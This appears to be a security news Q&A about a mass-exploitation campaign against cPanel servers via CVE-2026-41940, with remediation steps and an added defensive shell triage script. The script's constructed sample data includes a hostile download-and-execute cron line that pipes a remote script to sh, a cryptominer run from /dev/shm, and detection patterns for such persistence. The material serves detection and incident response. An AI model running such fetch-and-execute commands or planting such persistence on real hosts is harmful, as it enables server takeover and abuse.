Inside the cPanel Zero-Day Attack: 40,000+ Servers Hit — What You Need to Know
<p>In a widespread and ongoing campaign, cybercriminals have compromised well over 40,000 servers by exploiting a recently patched zero-day vulnerability in cPanel, a popular web hosting control panel. The attacks, which target CVE-2026-41940, grant attackers administrative access to affected systems, enabling them to install backdoors, steal data, and potentially launch further attacks. This Q&A breaks down the technical details, impact, and urgent steps administrators must take to protect their environments.</p>
<h2 id="q1">What Exactly Happened in the cPanel Exploitation Campaign?</h2>
<p>Starting in early 2026, security researchers observed an aggressive wave of attacks against internet-facing cPanel servers. The attackers leveraged a previously unknown vulnerability, designated CVE-2026-41940, that cPanel had silently patched just weeks earlier. Although the fix was available, many administrators had not yet applied it, leaving their systems exposed. Because cPanel's own services run with root privileges, a successful exploit gave the attackers full root access to the host, which they used to deploy persistent backdoors, exfiltrate sensitive customer data and, in some cases, pivot to other connected services. The campaign is still active, with new compromise reports emerging daily. The scale, over 40,000 servers affected, makes this one of the largest mass-exploitation campaigns against hosting infrastructure in recent memory (exploitation of unpatched deployed software, rather than a supply-chain compromise of the vendor's own releases).</p><figure style="margin:20px 0"><img src="https://www.securityweek.com/wp-content/uploads/2024/09/update-patch-exploited.jpeg" alt="Inside the cPanel Zero-Day Attack: 40,000+ Servers Hit — What You Need to Know" style="width:100%;height:auto;border-radius:8px" loading="lazy"><figcaption style="font-size:12px;color:#666;margin-top:5px">Source: www.securityweek.com</figcaption></figure>
<h2 id="q2">Which Vulnerability Was Exploited and How Does It Work?</h2>
<p>The attacks exploit <strong>CVE-2026-41940</strong>, a vulnerability in cPanel's authentication and session-management components. The flaw lets an unauthenticated remote attacker bypass the login checks and execute arbitrary commands with administrative privileges: a specially crafted HTTP request to a vulnerable server is enough to obtain <code>root</code> without ever presenting valid credentials. cPanel shipped a silent fix in February 2026 and withheld the technical details to limit the exploitation window. Unfortunately, diffing the patched code against the previous release quickly revealed the flaw, working exploits followed within days, and the widespread campaign we see today began.</p>
<h2 id="q3">How Many Servers Were Compromised and What Is the Scope?</h2>
<p>According to telemetry from multiple security firms, the number of compromised servers has surpassed <strong>40,000</strong> and continues to climb. The victims range from small personal hosting accounts to large managed hosting providers across North America, Europe, and Asia. The attacks are not limited to specific industries; any organization running an unpatched, internet-reachable cPanel installation is at risk. Researchers note that the actual number is probably higher, as many compromised servers remain undetected. The attackers are systematically scanning IP ranges and exploiting every unpatched host they find, so the campaign will keep expanding for as long as administrators delay updating.</p>
<h2 id="q4">Who Is Behind These Attacks and What Are Their Motives?</h2>
<p>Attribution is still under investigation, but early indicators point to a financially motivated threat actor with ties to cybercrime forums where cPanel exploits are traded. The group—sometimes tracked as <em>RedPanel</em> by some researchers—has demonstrated a high degree of automation, scanning the internet for vulnerable hosts and deploying a common set of post-exploitation tools. Their primary goal appears to be data extortion and cryptocurrency mining. However, some compromised servers have been used to host phishing pages or act as command-and-control nodes. The broad geographic distribution and consistent attack patterns suggest a coordinated operation rather than a lone hacker.</p>
<h2 id="q5">What Steps Should cPanel Administrators Take Immediately?</h2>
<p>If your server is still running an unpatched version of cPanel, <strong>apply the latest update immediately</strong>; the fixed version was released in February 2026. Then treat the host as potentially compromised until proven otherwise, because the exploit was in use before the vulnerability became public: look for unexpected accounts (in particular a second user with UID 0), unauthorized SSH keys in <code>authorized_keys</code> files, suspicious cron jobs, and unknown processes, especially anything running from <code>/tmp</code> or <code>/dev/shm</code>. Review authentication and web-server logs for access from unfamiliar sources from the date the patch was released onward, not only from the date CVE-2026-41940 was made public. Use a security scanner or bring in an incident response team for a thorough audit, and if you find evidence of compromise, rebuild the server from clean media rather than cleaning it in place: an attacker with root can leave persistence that a manual sweep will not find. Once the host is known clean, rotate all passwords and API tokens (rotating them on a still-compromised host simply hands the attacker the new ones), enable multi-factor authentication (MFA) for cPanel access, and restrict network exposure of the panel ports and segment the host from other services to limit lateral movement.</p>
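<p>The checks above, as an added shell example that is not part of this article or of cPanel's own tooling. Each function reads one data source on standard input, so the same function runs against the live host (for example <code>find_uid0_accounts &lt; /etc/passwd</code>) or against files collected from a suspect server. The allowlists, account names, key blobs, cron lines, process listing and log lines are constructed for illustration and are not real indicators; replace the allowlists with the values from your own build baseline.</p>

```shell
#!/bin/sh
# Post-patch triage helpers for a Linux host running cPanel (added example).
# Every check reads its input on stdin; the allowlist argument is a
# space-separated list. All sample data below is constructed, not real.

# Accounts other than root with UID 0: a second superuser is a classic backdoor.
find_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }'
}

# Login-capable accounts (shell is not nologin/false) missing from the baseline.
# $1 = allowlist of expected login account names.
find_unexpected_shell_accounts() {
    awk -F: -v base=" $1 " \
        '$7 !~ /(nologin|false)$/ && index(base, " " $1 " ") == 0 { print $1 }'
}

# authorized_keys lines whose key blob (the base64 field, which always starts
# with "AAAA") is not in the approved set. $1 = allowlist of approved blobs.
find_unknown_ssh_keys() {
    awk -v base=" $1 " '
        /^[[:space:]]*(#|$)/ { next }
        {
            blob = ""
            for (i = 1; i <= NF; i++) if ($i ~ /^AAAA/) { blob = $i; break }
            if (blob != "" && index(base, " " blob " ") == 0) print
        }'
}

# Cron lines that download-and-execute, decode an embedded payload, or run
# something from a world-writable directory.
find_suspicious_cron() {
    grep -E '(curl|wget)[^|]*[|][[:space:]]*(ba)?sh|base64[[:space:]]+(-d|--decode)|/(dev/shm|tmp|var/tmp)/' || :
}

# `ps -eo pid,user,args` output: processes whose executable lives in a
# world-writable directory or was deleted after launch (memory-resident miner).
find_suspicious_processes() {
    awk 'NR > 1 && ($3 ~ /^\/(tmp|dev\/shm|var\/tmp)\// || $0 ~ /\(deleted\)/) { print $1 ":" $3 }'
}

# Successful sshd logins (auth.log format) from sources outside the allowlist.
# $1 = allowlist of expected admin source IPs.
find_unknown_login_sources() {
    awk -v base=" $1 " '
        /sshd\[[0-9]+\]: Accepted / {
            ip = $0; sub(/.* from /, "", ip); sub(/ .*/, "", ip)
            if (index(base, " " ip " ") == 0) print ip
        }' | sort -u
}

# ---- Constructed sample inputs (assumed, for the demo only) -----------------
PASSWD_SAMPLE='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
deploy:x:1001:1001::/home/deploy:/bin/bash
sysadmn:x:0:0::/root:/bin/bash'

KEYS_SAMPLE='# approved admin key
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFakeApprovedKeyBlob admin@jump
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQFakeUnknownKeyBlob root@unknown'

CRON_SAMPLE='0 3 * * * /usr/local/cpanel/scripts/upcp --cron
*/5 * * * * curl -s http://203.0.113.7/x.sh | sh
@reboot /dev/shm/.x/kdevtmpfsi'

PS_SAMPLE='  PID USER     COMMAND
  812 root     /usr/sbin/sshd -D
 4419 nobody   /dev/shm/.x/kdevtmpfsi -o pool.example:3333
 4420 root     /usr/local/cpanel/cpsrvd'

AUTH_SAMPLE='Feb 22 02:11:04 host1 sshd[2201]: Accepted publickey for deploy from 198.51.100.5 port 51022 ssh2
Feb 22 02:13:58 host1 sshd[2290]: Accepted password for root from 203.0.113.7 port 40112 ssh2
Feb 22 02:14:02 host1 sshd[2291]: Accepted password for root from 203.0.113.7 port 40118 ssh2'

run_demo() {
    echo "== extra UID 0 accounts ==";        printf '%s\n' "$PASSWD_SAMPLE" | find_uid0_accounts
    echo "== unexpected shell accounts ==";   printf '%s\n' "$PASSWD_SAMPLE" | find_unexpected_shell_accounts 'root deploy'
    echo "== unknown SSH keys ==";            printf '%s\n' "$KEYS_SAMPLE"   | find_unknown_ssh_keys 'AAAAC3NzaC1lZDI1NTE5AAAAIFakeApprovedKeyBlob'
    echo "== suspicious cron lines ==";       printf '%s\n' "$CRON_SAMPLE"   | find_suspicious_cron
    echo "== suspicious processes ==";        printf '%s\n' "$PS_SAMPLE"     | find_suspicious_processes
    echo "== logins from unknown sources =="; printf '%s\n' "$AUTH_SAMPLE"   | find_unknown_login_sources '198.51.100.5'
}

if [ "${1:-}" = "--demo" ]; then run_demo; fi
```

<p>Run it with <code>--demo</code> to see each check against the constructed data, or feed the functions real input (<code>find_unknown_login_sources '203.0.113.10' &lt; /var/log/auth.log</code>). The checks are deliberately allowlist-based rather than signature-based: after a root-level compromise, anything not in your known-good baseline deserves a look, and the absence of findings from a script like this is not proof the host is clean.</p>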
<h2 id="q6">Was There Any Warning Before the Attacks Began?</h2>
<p>cPanel’s silent patch in February 2026 was an attempt to fix the vulnerability without drawing attackers' attention to it, a practice known as silent patching. It is no substitute for an advisory: within days the changed code had been diffed, the flaw identified and proof-of-concept exploits published. That left administrators only a few days to update before weaponized exploits were widely available, and many did not make that window, not least because an unannounced fix looks like any other routine release. cPanel has since issued an emergency advisory urging all users to update, but the damage from the initial wave is already extensive. The incident underscores the value of automated patch management and of subscribing to vendor security advisories so that a fix is applied before, not after, the exploit is public.</p>
<h2 id="q7">What Are the Long-Term Implications for cPanel Users?</h2>
<p>The breach of 40,000 servers will likely lead to a loss of trust in cPanel as a platform, pushing some users toward alternative control panels like Plesk or DirectAdmin. For affected hosting providers, reputation damage and potential legal liability from leaked customer data could result in long-term financial consequences. On the positive side, the incident has prompted cPanel to revamp its security advisory process and commit to faster, more transparent disclosures. For the wider web hosting industry, this attack serves as a reminder that vulnerabilities in widely used management software, which by design runs as root and is exposed to the internet, are a prime attack vector. Administrators should treat cPanel updates as critical, keep the panel segmented from other services, and back it with a tested incident response plan.</p>